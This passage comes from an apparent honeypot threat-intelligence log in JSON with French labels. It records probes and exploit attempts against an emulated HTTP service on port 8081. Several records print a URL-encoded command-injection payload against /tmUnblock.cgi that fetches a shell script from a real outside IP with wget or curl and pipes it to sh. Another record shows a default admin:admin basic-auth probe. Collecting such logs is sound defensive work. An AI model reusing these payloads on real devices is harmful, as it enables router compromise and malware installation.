YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/\u0022, \u0022waf_tags\u0022: [\u0022950734:sap-sapcontrol-path\u0022], \u0022waf_rule_names\u0022: [\u0022sap-sapcontrol-path\u0022], \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022}, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 40}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022mitre_tactics\u0022: [\u0022TA0007\u0022, \u0022TA0001\u0022], \u0022mitre\u0022: \u0022TA0007\u0022, \u0022threat_family\u0022: [\u0022scanner\u0022], \u0022confidence\u0022: 0.8, \u0022classification_confidence\u0022: 0.8, \u0022recommended_client_action\u0022: \u0022monitor\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022131b88627b005953e3e4760624ae297ab5913542\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/\u0022, \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022attack_vector\u0022: \u0022Sonde HTTP \u00b7 via HTTP:8081 \u00b7 (sonde \/ probe)\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u00b7 risque 40\/100\u0022, \u0022confidence_pct\u0022: 80, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 40}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022attack_stage_label\u0022: \u0022Sonde \/ probe\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022risk_score\u0022: 40, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: null, \u0022tags_summary_labels_fr\u0022: null, \u0022recommended_action\u0022: \u0022monitor\u0022, \u0022recommended_action_label\u0022: \u0022Surveiller\u0022, \u0022mitre\u0022: \u0022TA0007\u0022, \u0022mitre_technique\u0022: \u0022TA0007\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/\u0022, \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022Sonde HTTP \u00b7 via HTTP:8081 \u00b7 (sonde \/ probe)\u0022, \u0022evidence_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022discovery\u0022, \u0022label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022matched_patterns\u0022: [], \u0022ban_policy\u0022: \u0022advisory_monitor\u0022, \u0022tags_list\u0022: [\u0022950734:sap-sapcontrol-path\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950734:sap-sapcontrol-path\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":4,"bytes_in":99},{"id":11809657,"ip":"45.153.34.252","ts":"2026-07-14 02:29:22.000000","proto":"tcp","src_port":35856,"dst_port":8081,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002264082a1af3fcfb231944e267d5493de0b8e0037c\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 289, \u0022payload_entropy\u0022: 5.114664628936492, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002286edc1121ce6e69577a4766b6494c1ef34c5a689\u0022, \u0022event_fingerprint\u0022: \u00221ce67ae6beab4eb64ade012f0c02d6d431b746c8\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022497f550dffb549cc468c7b52e196f3c6\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%60 HTTP\/1.1\\r\\nHost: 62.3.\u0022, \u0022payload_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00221ff3ec29e1cf33a283010724c8709d45ceb7c9da\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lublk%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http:\/\/91.92.\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/tmUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":289},{"id":11809658,"ip":"45.153.34.252","ts":"2026-07-14 02:29:22.000000","proto":"tcp","src_port":35864,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/tmUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00226cff281bfb0055f2e5c6afc1d923500419949544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 386, \u0022payload_entropy\u0022: 5.3151423501998325, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00221b72e0cad9dc4a2599a7718a58f3889624ca7773\u0022, \u0022event_fingerprint\u0022: \u002206fbfbf2356862692413fb487e5b816ccb56c176\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, 